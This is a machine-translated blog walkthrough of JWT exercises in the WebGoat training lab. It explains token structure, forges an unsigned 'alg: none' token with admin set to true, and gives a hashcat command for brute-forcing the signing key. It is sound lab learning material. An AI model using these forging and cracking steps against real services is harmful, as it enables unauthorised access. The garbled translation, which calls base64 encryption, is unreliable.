JWT unauthorized access vulnerability
Article directory
-
- JWT unauthorized access vulnerability
-
- Original reference: [xiu](http://www.xiusafe.com/2023/02/08/JWT/)
- 1 Shooting range setup:
- 2 Header composition of JWT
-
- 2.1 Head
-
- 2.1.1 alg:
- 2.1.2 type:
- 2.2 payload
- 2.3 Signature
- 3 Vulnerability recurrence
-
- 3.1 Attack point token (third level)
- 3.2 Parse and encrypt the token value base64 encryption method, which can only be viewed.
- 3.3 Modify the decrypted json and encrypt it into base64
-
- 3.3.1 base64 encryption method decryption network
- 3.3.2 Get the modified base64 and put it into the interpretation encryption method
- 3.3.3 Finally, base64 is formed. There must be points in the back. The background is based on point separation to obtain values.
- 3.4 Use bp to capture the packet, replace the token value with the encrypted base64, and send it
- 4 Level 4
- 5 Level 5
- 6 Level 7
Original reference:xiu
1 Shooting range construction:
webgoat-server-8.1.0.jar use this range Start the shooting range as: java -jar webgoat-server-8.1.0.jar --server.port=8888
Visit the page: http://127.0.0.1:8888/WebGoat/ -> Select registration
Fill in the user password and click Register
Select JWT
Option 3, there are process instructions
Choose this fourth level to vote
Switch a user, vote, and delete the ticket. It prompts that only the admin user can use burp suite to delete the sent data packet.
bp catches the package and prompts that only admin can reset the ticket
The user’s identity is in the token, and the value inside is analyzed to modify the token.
Cookie: access_token=eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE2OTU0NzA1MzgsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0.19GkQq28-pNBY-8wYA3LnrEOZ5gF1h2HggUH73nTh994 L2ZK8sJmkx1tphdGWpgjHTQoXBDcCCZdAoVWwl1GCw;
2 Header composition of JWT
JWT (JSON Web Token) consists of three parts: Header, Payload, and Signature
(Signature).
Header: The header usually consists of two parts, the algorithm type and the token type.
Algorithm type: Specify the algorithm used to generate the signature, such as HMAC, RSA, or ECDSA.
Token type: Specify the type of token, the common one is JWT.
The header is represented using Base64Url encoding and is the first part of the entire JWT. An example of the header:
{
"alg": "HS256",none
"typ": "JWT"
}
Payload: The payload stores statements and other relevant information about the user or entity.
Statement: Information such as user ID, role, permissions, etc.
Registration statement: includes some standard statements (such as issuer, expiration time, etc.) and some customized
statement.
The payload is also represented using Base64Url encoding and is included as the second part of the overall JWT. An example of a payload:
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
}
Signature: The signature is the result of signing the header and payload and is used to verify the integrity of the JWT
sex and authenticity.
Signature generation method: Base64Url encode the header and payload and splice them together, and then use
Sign with the specified encryption algorithm (such as HMAC, RSA) and add the resulting signature to the JWT.
2.1 Head
2.1.1 alg:
? Describe the parameters of the algorithm used for the signature of this JWT. Common values are HS256 (default), HS512, etc., or it can also be
? None. HS256 stands for HMAC SHA256.
2.1.2 type:
? Indicate that the type of this token is JWT
2.2 payload
The payload is where valid information is stored. This name seems to refer specifically to the cargo carried on the plane. This effective information contains three parts: * Statement registered in the standard * Public statement * Private statement \t Statements registered in the standard (recommended but not mandatory): * iss:jwt issuer * sub: users targeted by jwt * aud: the party receiving jwt * exp: expiration time of jwt, this expiration time must be greater than the issuance time * nbf: defines the time before which the jwt is unavailable. *iat:jwt issuance time * jti: The unique identity of jwt, mainly used as a one-time token to avoid replay attacks.
2.3 Signature
The server has a secret that will not be sent to the client, and uses the algorithm specified in the header for the header and declared content; This password is encrypted, and the generated string is the signature of the JWT
3 Vulnerability recurrence
3.1 Attack point token (third level)
The alg algorithm HS256 in the header is set to none [none]
Before change:
{
"alg": "HS256",
"typ": "JWT"
}
After modification:
{
"alg": "none",none
"typ": "JWT"
}
?
3.2 Parse and encrypt the token value base64 encryption method, which can only be viewed.
https://jwt.io/
The colors mark the corresponding head, middle and tail, and they correspond accordingly
3.3 Modify the decrypted json and encrypt it into base64
3.3.1 base64 encryption method decryption network
https://www.bejson.com/enc/base64/ # base64 encryption network https://jwt.io/ # base64 encryption method view
ewogICJpYXQiOiAxNjk1NDcwNTM4LAogICJhZG1pbiI6ICJ0cnVlIiwKICAidXNlciI6ICJhZG1pbiIKfQ
3.3.2 Get the modified base64 and put it into the interpretation encryption method
https://jwt.io/ # View with base64 encryption method
3.3.3 Finally form base64, there must be dots at the end, and the background is based on dot separation to obtain values
ewogICJhbGciOiAibm9uZSIKfQ.ewogICJpYXQiOiAxNjk1NDcwNTM4LAogICJhZG1pbiI6ICJ0cnVlIiwKICAidXNlciI6ICJhZG1pbiIKfQ.
3.4 Use bp to capture packets, replace the encrypted base64 with the token value, and send
? Tip: Congratulations, successfully completed the task
4 Level 4
? Modify the payload data, change admin to true, and change the encryption method to none.
5 Level 5
Password blasting
Modify exp validity time Explosion key hashcat -m 16500 jwt.txt -a 3 -w 3 1.txt -m 16500 The 16500 here corresponds to jwt’s token blasting; -a 3 represents brute force cracking -w 3 can be understood as high-speed cracking, which is the kind of high-speed that makes the desktop process unresponsive. jwt.txt is the file where I saved the token that the question requires to crack. pass.txt password dictionary
6 Level 7
